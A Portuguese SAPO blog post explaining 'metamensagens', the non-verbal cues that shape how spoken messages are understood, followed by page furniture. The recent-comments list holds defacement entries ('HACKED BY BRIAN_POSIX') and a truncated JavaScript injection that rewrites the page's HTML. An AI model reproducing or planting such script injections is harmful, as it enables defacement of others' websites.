Sabia que em uma conversa, os componentes verbais provavelmente terão menos de 35% do significado percebido pelo outro?

 

Mais de 65% é transmitido por canais não-verbais (pelas metamensagens).

 

Durante uma conversa ou uma interação, as informações transmitidas por meio de significados de palavras e frases gramaticais é chamado “mensagem”, sendo a metamensagem tudo aquilo que rodeia as palavras, são mensagens de um nível mais elevado que dão ênfase ou pistas de como interpretar a mensagem em si, compreende as atitudes e os sentimentos da pessoa que comunica.

Geralmente são não verbais, podem ser tons e sons, gestos e posturas que conferem outros significados para o conteúdo da comunicação.

 

Atrás de tudo que vê existe uma metamensagem, e é à metamensagem que respondemos mais incisivamente.

O poder das metamensagens é amplamente utilizado, de forma consciente, em discursos políticos, no marketing e na publicidade; de modo a influenciar o seu entendimento e percepção.

 

Geralmente as metamensagens são percebidas de acordo com as experiências passadas de quem está vendo, e quando não planeadas são as responsáveis pela maioria dos conflitos entre as pessoas. É importante entender o quanto as metamensagens podem ficar fora da consciência dos comunicadores e podem acabar por criar grandes impactos, sem as pessoas se darem conta disso.

Tomar consciência das metamensagens ajuda o comunicador a reconhecê-las e a utilizá-las.

 



De
 
Nome

Url

Email

Guardar Dados?

Ainda não tem um Blog no SAPO? Crie já um. É grátis.

Comentário

Máximo de 4300 caracteres



Copiar caracteres

 



O dono deste Blog optou por gravar os IPs de quem comenta os seus posts.

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO